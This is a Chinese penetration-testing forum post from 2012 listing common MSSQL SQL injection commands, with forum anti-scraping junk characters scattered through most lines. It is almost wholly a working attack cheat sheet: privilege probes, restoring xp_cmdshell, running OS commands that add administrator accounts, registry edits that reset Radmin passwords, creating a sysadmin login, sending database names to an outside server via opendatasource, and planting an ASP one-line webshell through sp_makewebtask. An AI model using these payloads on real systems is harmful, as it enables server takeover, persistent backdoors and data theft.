找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 阿D常用的一些注入命令
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1857|回复: 0
打印 上一主题 下一主题

阿D常用的一些注入命令

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-13 17:26:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
阿D常用的一些注入命令$ Z2 S( x! K7 z1 v/ P% V( C
//看看是什么权限的9 R: M& Z6 k) @& l- l
and 1=(Select IS_MEMBER('db_owner'))
8 b6 ~5 e( T, e+ {" O$ B- ]And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--1 s+ Z0 X3 u" T

! o  q5 I4 A# @6 B! |//检测是否有读取某数据库的权限
, b( L0 d$ {; o# s& uand 1= (Select HAS_DBACCESS('master'))
- G' z- x: `; ^" u; s0 V/ `8 |" W/ nAnd char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
% \' I  z4 E" i$ L3 Z# }
4 p. \& k% m; m
2 @1 J: H5 G5 b" i( h数字类型* r4 T1 @5 E$ h# c  Q) f) a! ]
and char(124)%2Buser%2Bchar(124)=0, j9 v* v- k' {" A

& g! `% U- ]- Q. M0 Z5 {1 Z/ I- }: Z字符类型
+ q; }2 X5 F. f1 U6 h' and char(124)%2Buser%2Bchar(124)=0 and ''='
2 a  \9 g8 r6 p% a& D) ~- K4 z. |5 u8 H5 l
搜索类型
$ a" e8 W0 C6 D" ^' and char(124)%2Buser%2Bchar(124)=0 and '%'=': X$ D  O6 j* [/ `
' g% A: d& V7 U' e1 f, R
爆用户名
3 \+ u+ e' I6 w1 Land user>09 L3 Q( D# M1 M9 z
' and user>0 and ''='& f+ s4 Z4 b* l  x; ?: {

) m. f3 M' G+ j$ H检测是否为SA权限
+ R. Z5 h; F6 t% K5 yand 1=(select IS_SRVROLEMEMBER('sysadmin'));--2 W9 M1 B6 Q1 o% I% K
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --. v! \1 }7 g8 J, f& C

7 ?7 M% L& \7 C% J  a检测是不是MSSQL数据库: v" S! r3 t1 K: S0 ?- D. q0 g- m0 h
and exists (select * from sysobjects);--
3 R+ M1 j# A4 d3 m9 |2 Z2 @9 o
( A6 @5 l7 Q# O  I  g2 |检测是否支持多行
! d' }! _; [7 L* O2 X: F;declare @d int;--
+ p& u" W; d3 m8 `3 y$ Q9 }* n+ E+ i! S
恢复 xp_cmdshell
. ?. @( t( C! D# a;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
2 k% n# Z' W9 g8 u/ _4 \* y& ~- s: i& P" X! i. L8 K7 p' H

1 W: u0 u8 H9 Z: r3 vselect * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version') 3 n/ V$ L8 i$ {' T6 w- q4 t* p. _7 B

* e1 X/ @: o6 m2 g1 `: A1 F1 c//-----------------------
, A, i9 W( p: ^; L  C, V//      执行命令- N3 P6 `4 U5 h+ p3 D
//-----------------------3 l, t8 \: v* K1 p8 |) N7 e
首先开启沙盘模式:. A9 L9 Y9 k( W
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',14 n8 B3 k8 x. u$ h) b7 u
  K+ R) e% q7 j9 {
然后利用jet.oledb执行系统命令
3 D+ Z* k3 i: e+ sselect * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')) M1 r" j6 v4 L6 G
& ~6 X) C, U4 T1 `$ t1 j# J. d
执行命令8 X. }1 U+ q. S# Q  l* C$ g% b% R
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
# v5 @$ X/ P6 }; s. C4 j) ]+ e; I* K; S, ^3 x" b. u$ J
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
  @1 {. _0 ~& k+ r/ Q4 |2 C3 o
判断xp_cmdshell扩展存储过程是否存在:
: ^) Q3 u8 ]) n" e5 [' p2 r2 {* qhttp://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')2 k+ a/ p4 I3 J9 W+ l9 \0 a; P- i5 I

5 Q/ ?/ a/ N4 O5 o写注册表" D: Y1 O  ~* @; c
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
! o9 @( u/ R" T
/ }7 ~2 H& Q1 {5 _6 e. M. d( TREG_SZ
3 c1 x1 R# R* S, h8 b+ [2 ]3 s5 t+ S$ O* D5 m
读注册表) |$ f: u1 j' Q. l2 F8 w+ y* ^
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'" E# R9 s+ s. \9 c" a. Y, y+ P8 |5 W
/ I- ~$ a- b+ p3 a$ [; G4 ~2 @4 o
读取目录内容
" f5 [$ c+ ~% E* {9 ^  bexec master..xp_dirtree 'c:\winnt\system32\',1,1
( w( t( e1 Z9 ^% z. t
! ]$ a* C/ R9 d* J, F; Q3 G) ~
8 y( x/ N1 s0 i数据库备份
+ u3 U; w9 B6 n9 ybackup database pubs to disk = 'c:\123.bak'$ h5 F, Y2 ]0 \
) n6 A# B. y9 f* T' N% V& S
//爆出长度
/ C7 [9 e- I% ^" rAnd (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
) K/ p4 C. e0 U1 \3 W3 y/ U
, l0 R; M0 F% V) s
& c: P. x' n2 H& g. Q. G4 }' F& N( B- w7 `" O3 N
更改sa口令方法:用sql综合利用工具连接后,执行命令:1 d9 g' E) W8 n/ u) m
exec sp_password NULL,'新密码','sa'. B9 a" q' ~6 E7 ^8 ]6 V9 x
9 a6 T1 U$ s' ?' I
添加和删除一个SA权限的用户test:
# Z  w. w2 X! Vexec master.dbo.sp_addlogin test,ptlove
6 c, @% G7 B$ R' p4 _& Q* O8 |: J# z% eexec master.dbo.sp_addsrvrolemember test,sysadmin
7 ^; f' y* Z. ]( A" W& U8 v' |9 b6 g8 W2 V7 P9 y
删除扩展存储过过程xp_cmdshell的语句: $ N6 k0 g0 v' B. B1 A
exec sp_dropextendedproc 'xp_cmdshell'6 `3 G6 z9 h$ [6 a& [
3 U8 i  l- u3 G- g  K+ ?
添加扩展存储过过程
" X' H/ p' l5 P1 T! c3 r3 sEXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
2 |2 s3 i9 A3 ]5 ^; SGRANT exec On xp_proxiedadata TO public
& q% a( H! X+ p7 Q- \
, u0 `/ I& k$ z7 h- W. ^% @! @; j5 X9 V3 i5 D4 P
停掉或激活某个服务。 7 x) E2 B! X$ `9 _" s& H- E
7 P" ~& Z3 [; I  e( g& ]( U* h3 ]
exec master..xp_servicecontrol 'stop','schedule'
$ n$ ~/ E/ U. n6 G, Rexec master..xp_servicecontrol 'start','schedule'1 B0 v) P8 H4 X  w
8 z# W& m; F9 d. {- i0 {/ ~
dbo.xp_subdirs
) @1 B. Z+ }  |/ m& }. @
! Y% C, N) W+ m1 \# u只列某个目录下的子目录。3 @3 N4 o4 X3 q+ i2 e& e- Y
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'; Y3 S/ E# u2 l# `5 k
7 D+ J9 e7 y7 m6 E, l* p9 N
dbo.xp_makecab
! d' I/ i, \5 V* n% Z8 Q8 c9 f6 y! t
将目标多个档案压缩到某个目标档案之内。9 `5 O! i; m: b3 |9 V
所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。
5 [  k- [7 @9 C" F" m) v  \7 ^  s
( v  s* e- R/ U3 i( [1 _dbo.xp_makecab
" s7 r( P2 X+ K: E4 W'c:\test.cab','mszip',1,# E4 {+ S: _+ {( `
'C:\Inetpub\wwwroot\SQLInject\login.asp',4 u$ m/ Z+ J$ ~$ D
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
- E4 s: }0 v5 [0 h6 T6 [/ j9 w) s9 b. y  t4 Q
xp_terminate_process
! Q. E, c1 \  ]6 m4 [
* a% R" V: W& u停掉某个执行中的程序,但赋予的参数是 Process ID。7 @% L: L9 r. K4 M2 Q7 u6 R. D
利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID
7 s! d3 G9 H1 B+ |4 |1 V1 a" `, K6 m2 H
xp_terminate_process 24849 _2 K! K, l* |$ @, [
: x8 C+ G8 [5 ^2 \
xp_unpackcab
- t, Z: V  Z# ?$ c0 i: T; i: A" ~4 B1 t
解开压缩档。
& a' ^* C0 e/ y% E8 v! \* O' }8 z6 m8 V( r, q6 u  q. K8 i" B1 r
xp_unpackcab 'c:\test.cab','c:\temp',16 C: |8 q" n& S* X& ^: F

1 a8 ]- i6 F6 m! W  M( s3 |. b( |: P9 d1 L8 _& c+ z+ `
某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
1 c* Q5 a' F/ J  G8 u2 _: }" h
  h& ?1 S/ M" screate database lcx;
* ]3 P# ?* |! R9 ICreate TABLE ku(name nvarchar(256) null);
) W) d% b0 q+ H1 l+ \Create TABLE biao(id int NULL,name nvarchar(256) null);4 P% |' w1 \) W1 s

2 Q( X& B: p5 q% D//得到数据库名' I5 c* Z3 V" H8 g
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases: p3 A( z" d# @9 ~  ]  m

1 i, d5 W) w1 `. ^( w! u$ t2 V2 W" c. g  H7 k/ g6 M4 w0 w
//在Master中创建表,看看权限怎样; @* ^# c. E- n5 u8 \3 W
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
! M  d6 ^$ {+ A0 x( ?; t; S2 }9 L, b! R( j5 M
用 sp_makewebtask直接在web目录里写入一句话马:
; o5 e2 f$ B; T, ahttp://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
( y: Q8 Z/ }& J% s7 L; G7 S8 u# t/ M1 U. h4 g& h7 j" v
//更新表内容; ?2 l% ]. u1 ^- s- P
Update films SET kind = 'Dramatic' Where id = 123
  I* q; c8 P4 V7 B
: L" U) G+ k% l5 K5 U//删除内容
5 u+ }' o# v5 Z& q/ r0 \delete from table_name where Stockid = 3
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表